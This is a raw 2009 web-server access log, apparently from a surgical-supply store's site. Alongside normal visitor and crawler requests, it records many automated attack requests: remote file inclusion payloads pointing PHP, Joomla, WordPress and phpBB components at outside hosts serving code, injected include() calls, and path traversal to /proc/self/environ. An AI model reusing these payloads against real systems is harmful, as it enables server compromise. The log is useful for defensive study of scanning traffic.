70.87.64.234 - - [13/Jul/2009:00:37:00 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:37:05 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:37:05 -0400] "GET /logs/access_log.Q109070200%20%20/wp-content/plugins/dm-albums/dm-albums.php?currdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:37:07 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:37:07 -0400] "GET /logs/access_log.Q109062900/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:37:08 -0400] "GET /logs/access_log.Q109062900/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:37:09 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:37:10 -0400] "GET /logs/access_log.Q109060500/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:37:11 -0400] "GET /logs/access_log.Q109070200%20%20/wp-content/plugins/dm-albums/dm-albums.php?currdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:37:14 -0400] "GET /logs/access_log.Q109060500/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:37:21 -0400] "GET /logs/access_log.Q109061300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:37:27 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:37:30 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:37:49 -0400] "GET /logs/access_log.Q109061300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.249.68.70 - - [13/Jul/2009:00:37:51 -0400] "GET /images/items/6471097_thumb.jpg HTTP/1.1" 200 1351 "-" "Googlebot-Image/1.0"
87.230.35.175 - - [13/Jul/2009:00:37:52 -0400] "GET /logs/access_log.Q109062900/index_inc.php?inc_ordner=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
87.230.35.175 - - [13/Jul/2009:00:37:52 -0400] "GET /index_inc.php?inc_ordner=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
76.12.17.218 - - [13/Jul/2009:00:37:52 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.230.35.175 - - [13/Jul/2009:00:37:52 -0400] "GET /logs/index_inc.php?inc_ordner=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
76.12.17.218 - - [13/Jul/2009:00:37:52 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:37:52 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.230.35.175 - - [13/Jul/2009:00:38:00 -0400] "GET /logs/access_log.Q109060500/index_inc.php?inc_ordner=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
221.143.40.35 - - [13/Jul/2009:00:38:09 -0400] "GET /logs/access_log.Q109060900%20%20//components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:38:50 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
221.143.40.35 - - [13/Jul/2009:00:38:51 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:39:02 -0400] "GET /logs/access_log.Q109061300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:39:02 -0400] "GET /logs/access_log.Q109060500%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.235.41.15 - - [13/Jul/2009:00:39:30 -0400] "GET /logs/access_log.Q109060700/bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/dalnet.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.819"
200.101.70.1 - - [13/Jul/2009:00:39:50 -0400] "GET /logs/access_log.Q109070300%20%20/wp-content/plugins/dm-albums/dm-albums.php?currdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:39:51 -0400] "GET /logs/access_log.Q109070300%20%20/wp-content/plugins/dm-albums/dm-albums.php?currdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:00:41:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
68.109.233.157 - - [13/Jul/2009:00:42:12 -0400] "GET /logs/access_log.Q109051300////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
68.109.233.157 - - [13/Jul/2009:00:42:13 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
68.109.233.157 - - [13/Jul/2009:00:42:13 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 9331 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
68.109.233.157 - - [13/Jul/2009:00:42:20 -0400] "GET /logs/access_log.Q109051400////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
86.35.0.115 - - [13/Jul/2009:00:42:51 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
86.35.0.115 - - [13/Jul/2009:00:42:51 -0400] "GET /?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
86.35.0.115 - - [13/Jul/2009:00:42:52 -0400] "GET /logs/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 200 9324 "-" "libwww-perl/5.810"
86.35.0.115 - - [13/Jul/2009:00:43:18 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
98.23.140.208 - - [13/Jul/2009:00:44:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:44 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:45 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:45 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:45 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:45 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:45 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:45 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:45 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:45 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
98.23.140.208 - - [13/Jul/2009:00:44:46 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
67.176.12.166 - - [13/Jul/2009:00:44:58 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.176.12.166 - - [13/Jul/2009:00:44:58 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.176.12.166 - - [13/Jul/2009:00:44:58 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.176.12.166 - - [13/Jul/2009:00:45:02 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
67.176.12.166 - - [13/Jul/2009:00:45:02 -0400] "GET /logs/access_log.Q109060700/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
67.176.12.166 - - [13/Jul/2009:00:45:02 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
67.176.12.166 - - [13/Jul/2009:00:45:08 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 223 "-" "XXXXXX"
67.176.12.166 - - [13/Jul/2009:00:45:09 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 250 "-" "XXXXXX"
67.176.12.166 - - [13/Jul/2009:00:45:09 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 228 "-" "XXXXXX"
67.176.12.166 - - [13/Jul/2009:00:45:12 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 223 "-" "XXXXXX"
67.176.12.166 - - [13/Jul/2009:00:45:12 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 250 "-" "XXXXXX"
67.176.12.166 - - [13/Jul/2009:00:45:12 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 228 "-" "XXXXXX"
210.205.57.2 - - [13/Jul/2009:00:45:19 -0400] "GET /logs/access_log.Q109060900%20%20//components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:00:46:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.236.242.164 - - [13/Jul/2009:00:46:35 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:46:35 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:46:42 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:47:02 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:00:47:03 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:47:05 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:47:07 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:47:11 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:47:12 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:47:12 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
